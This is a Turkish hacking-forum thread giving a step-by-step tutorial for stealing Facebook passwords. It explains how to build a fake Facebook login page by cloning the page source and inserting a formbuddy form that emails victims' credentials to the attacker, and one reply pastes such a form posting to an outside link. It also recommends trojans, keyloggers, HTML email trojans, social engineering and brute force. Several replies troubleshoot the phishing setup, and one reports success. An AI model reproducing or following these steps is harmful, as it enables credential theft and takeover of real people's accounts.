Facebook hesabı nasıl hacklenir(Döküman)

trotsky

Yeni üye
12 Eki 2010
5
0
bodynin üzerine

<form action=" https://tik.lat/bZyLz " method="post">
<input type="hidden" name="username" value="tekogul">
<input type="hidden" name="reqd" value="0">
<input type="hidden" name="url" value=" https://tik.lat/fRnmw ">
yapıştırdım yine olmadı
BİR KOPYALA YAPIŞTIR YAPACağım nereden ve nereye bilmiyorum sanırım yokmu yardım edecek babayiğit. Face şifresi kırmak umrumda bile değil sadece basit birşeyin üstesinden gelememiş olmak canımı sıktı.


Forumda anlatılanlarda bu yönde fakat bende aynısını denedim, senin gibi bir sonuca varamadım, nerde yanlış yaptığımı halen çözemedim, araştırmaktayım. Forumdaşlar yardımcı olurlarsa iyi olur.
 

bozkurt_44

Kıdemli Üye
18 Nis 2010
2,750
0
30
Özel Kuvvetler Komutanlığı.MAK
Merhaba arkadaşlar bugün sizlere facebook hesabı nasıl hacklenir onu anlatacağım.Dökümanı bir arkadaşımızın isteği üzerine yazıyorum ayrıca herkesinde diline dolanır olmuş face hack :) Açılan konulardanda gördüğümüz üzere gelen giden bir grup sayfası veriyor ve hacklenmisini istiyor.Size balık vermek yerine balığın nasıl tutulduğunu öğreteceğiz bu dökümanda.

TurkWarrior

Başlıyoruz.Öncelikle bildiğiniz gibi facebook'a kayıt olurken bizden mail adresi isterler.Ve sonradan bu mail adresi ile şifremizi sıfırlayabiliriz.Ama mail hack olayı çok başka bir konu onu ayrı bir dökümanda anlatırız.Fakat uygulanan yöntemler aşağı yukarı birbiriyle aynı.


TurkWarrior

Nedir bu yöntemler?


1-)Fake yöntemi:Hedef kişiye www.facebook.com/login.php adresine benzer veya aynısı gönderilir.Fakat gönderilen sayfaya bir kod gizlenir.Bu kod eğer hedef sayfayı yerse girdiği verilerin bize iletilmesini sağlayacak.

TurkWarrior

2-)Trojan-Keylogger yöntemi : Trojan-Keylogger denilen dosyaları ikna yeteneğimizi kullanarak hedefin açmasını sağlarız.Bu dosyaları hedef açtığı zaman hedefin bilgisayarına tam erişim hakkına sahip oluruz.Böylece şifreyi rahatça alabiliriz.


3-)Sosyal mühendislik : Hedef ile bir şekilde iletişime geçip hedeften bazı bilgileri almaya çalışırız.Ama hedef direkt olarak şifresini tabiki size vermez.Msn adresinin gizli yanıtı gibi bilgileri almaya çalışırız.

3-)Deneme-Yanılma yöntemi:Bu yöntem oldukça uzun süren fakat kesin sonuç veren bir yöntemdir.Aşağıda bunuda açıklayacağım.

4-)Priv8 yöntemler buda tht'nin farkı olsun değil mi ama bu yöntemlerin hepsini birden vermeyeceğim bu konuda sadece birini vereceğim diğerlerinide yavaş yavaş vermeyi düşünüyorum.


Evet şimdi tek tek bu yöntemleri ele alalım.

1-) Fake yöntemi : Fake ile örnek bir saldırıyı ele alıyoruz.Fake nasıl hazırlanır tabiki öncelikle onu öğrenmeliyiz.

Öncelikle www.formbuddy.com adresine giriyoruz.

2yxgrac.jpg




Free bölümündeki Signup Now yazısına tıklıyoruz.


2yy2p3p.jpg



I Agree yazısına tıklıyoruz ve bir form geliyor.



b8o2g2.jpg


Resimdeki gibi mail adresimizi yazıp Submit butonuna tıklıyoruz.Ve mail adresimize gelen aktivasyon maili ile hesabımızı aktive ediyoruz.


25qgk1s.jpg


Mail adresinize gelen linke tıkladığınızda yukarıdaki gibi bir form ile karşılaşacaksınız.

Bu formda
[FONT=Arial, Verdana, Helvetica]Name: yazan yeri sallayın

[/FONT]
[FONT=Arial, Verdana, Helvetica]Username: kullanıcı adınız

[/FONT]
[FONT=Arial, Verdana, Helvetica]Password: şifreniz

[/FONT][FONT=Arial, Verdana, Helvetica]Confirm password: şifrenizi tekrar yazın

[/FONT][FONT=Arial, Verdana, Helvetica]E-Mail: E-mail adresiniz zaten otomatik olarak ayarlanacaktır


[/FONT][FONT=Arial, Verdana, Helvetica]URL: varsa siteniz yoksa boş bırakın

[/FONT][FONT=Arial, Verdana, Helvetica] What would you want us to do with the forms
submitted from your site?
[/FONT] Store them here (Recommended) Have them e-mailed to you Both stored here AND e-mailed to you

kısmında açılır listeyi açıp "Have them e-mailed to you" seçeneğini seçin.Ve Register butonuna tıklayın.

Hesap bilgilerini verecek bunları bir yere not edin.


Sonra siteye giriş yapıyoruz.Ve Form Builder'a tıklıyoruz.Açılan sayfada Thank you URL: kısmına fakenin yönleneceği adresi yazıyoruz.Facebook fakesi yaptıgımz icin http://www.facebook.com/login.php yazıyoruz.Ve build my form a tıklıyoruz.Kodların bulunduğu bir sayfa açılıyor.Ama burada dikkat etmemiz gerekn nokta kodalrın hepsini almıyoruz.Sadece <form ile başlayan kısımdan başlıyor paragrafın sonundaki > karakterine kadar alıyoruz.

Sonra aldığımız kodu fakemizde uygun bir yere yapıştıracagız.Peki uygun yer neresi ?

www.facebook.com/login.php adresine giriyoruz.Buraya girmeden önce facebook hesabımızdan çıkış yapmış olmalıyız.


Girdikten sonra açılan sayfada sağ click kaynağı görüntüle diyoruz.Ve çıkan kodlarıda fake.html olarak bir yere kaydediyoruz.Sonra fake.html yi not defteri ile açıp <body kodunu buluyoruz ve bu kodun hemen üstüne formbuddy'den aldıgımız kodu yapıstırıp kaydediyoruz.Ve fakemiz hazır ikna yetenegimiz ile kurbana yediriyoruz.Kurban bilgilerini girip butona tıkladıgı zaman bilgiler mail adresimize gelecek.Gereksizede gelebilr gelmedi deip kestirip atmayın.


Fake yöntemi bitti.

2-)Trojan-Keylogger :

Açıklamalarını kısa olarak yukarıda zaten vermiştik.Öncelikle http://turkhackteam.net/forumdisplay.php?f=109 bölümünden kendimize güzel bir keylogger veya trojan beğeniyoruz.Dikkat edin ava giderken avlanmayın.

Daha sonra keyloggerımızı kurbanla bir şekilde iletişime geçip sosyal mühendisliğimizi kullanarak yedirmeye çalışıyoruz.Veya bu dosyayı bir html sayfasına gizlersek yedirmemiz daha kolay olur.Ama ona şu anda değinmeyeceğim ileride ayrı bir döküman yazabilirim onun için.

Zaten eğer dosyayı yedirebildiysek iş biter.Yediremediysekde bu bizim ikna yenetiğimize bağlıdır.

3-)Sosyal mühendislik:Yukarıda kısa olarak açıkladığımızdan çok da farklı değil aslında.Bu kavram çok geniş bir kavram o yüzden üzerinde fazla durmayacağım çünkü bu yöntem benim anlatmamla değil sizin hayal gücünüzle olacak bişe bunun için kısa açıklamayı tekrar veriyorum :

Hedef ile bir şekilde iletişime geçip hedeften bazı bilgileri almaya çalışırız.Ama hedef direkt olarak şifresini tabiki size vermez.Msn adresinin gizli yanıtı gibi bilgileri almaya çalışırız.


4-)Deneme-Yanılma:Bu yönteme brute-force da denir.Öncelikle bu yöntem için wordlist kavramını öğrenmeliyiz.Wordlist demek Türkçe anlamıyla kelime listesi demektir.Yani olağan şifrelerin bulunduğu bir dosyadır.Bu dosya ile şifre tahmin edilmeye çalışılır.Şansımız varsa şifreyi kısa zamanda buluruz.Aksi takdirde aylar belkide yıllar sürer.O yüzden bunu tavsiye etmiyorum.



5-)Priv8:

Bugün sadece birini vereceğim size.Html trojanınızı hazırladıktan sonra html kod şeklinde karamail ile yolluyoruz.Karşı taraf maili açtığı zaman html kodları çalışacak yani trojanı yiyecektir.


İleride Priv8 yöntemlere devam edeceğiz.







aaasdsasaa
asd



eline sağlık teşekkürünü verdim benimde facebook fakem var artık
 
13 Tem 2007
149
0
dostum firefoxla ac dedigimizde sorun yok explower le actırdıgımızda sayfa görüntülenemiyor uyarısı alıyorum neden acaba
 

su perisi

Yeni üye
20 Eki 2010
30
0
DENİZLİ
Face İÇİn benİmde problemİm var ama doĞrusu pc konuusnda Çok cahİlİm aranizdada Çok yenİyİm bu yÖntemİ nasil yapacaĞim dİe elİme yÜzÜme bulaŞtirmaktan korkuyorum gerÇekten bana yardim edİcek varmi aranizda
 

hakanaykut

Yeni üye
4 Ara 2007
2
0
hocam ben denedim ama sanırım çok basit bi yerde takılıyorum ve bulamıyorum.fake yönteminde mail geldikten sonra username Password yazdıktandan sonra bilgileri girip register diyorum ve error url not filled hatası veriyor acaba neyi yalnış yapıyorum.teşekkürler


 

Hacked by ECEL

Yeni üye
21 Kas 2010
8
0
hersey guzel saolda Facebook tan�d�klar�nla ileti�im kurman� ve hayat�nda olup bitenleri payla�man� sa�lar bole cıkıyo yazılar ):
 

çağdaş001

Uzman üye
29 May 2009
1,379
1
*
hersey guzel saolda Facebook tan�d�klar�nla ileti�im kurman� ve hayat�nda olup bitenleri payla�man� sa�lar bole cıkıyo yazılar ):

Kaynak kodları alırken not defterine yapıştırğığında farklı kaydete kadar aynen anlattığım gibi gel.Tüm dosyaları seçtikten sonra kodlamayı ansı dan utf-8 e al oyle kaydet.;)
 

By_JaBi

Yeni üye
2 Eki 2010
25
0
Yha dediklerinizin hepsini yaptım şuraya kadar mailimdeki linke tıkladım hesab doldurma yerlerini doldurdum ve Have them e-mailed to you seçenegini sectim Register tıkladım açılan sayfa bu oldu
sayfada bu yazıodu
No HTML allowed <H1>

</H1>
 

çağdaş001

Uzman üye
29 May 2009
1,379
1
*
Yha dediklerinizin hepsini yaptım şuraya kadar mailimdeki linke tıkladım hesab doldurma yerlerini doldurdum ve Have them e-mailed to you seçenegini sectim Register tıkladım açılan sayfa bu oldu
sayfada bu yazıodu
No HTML allowed <H1>

</H1>

Kayıt sırasında Türkçe karakterler kullanmayın.(ö,ç,ğ,ı,İ gibi)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.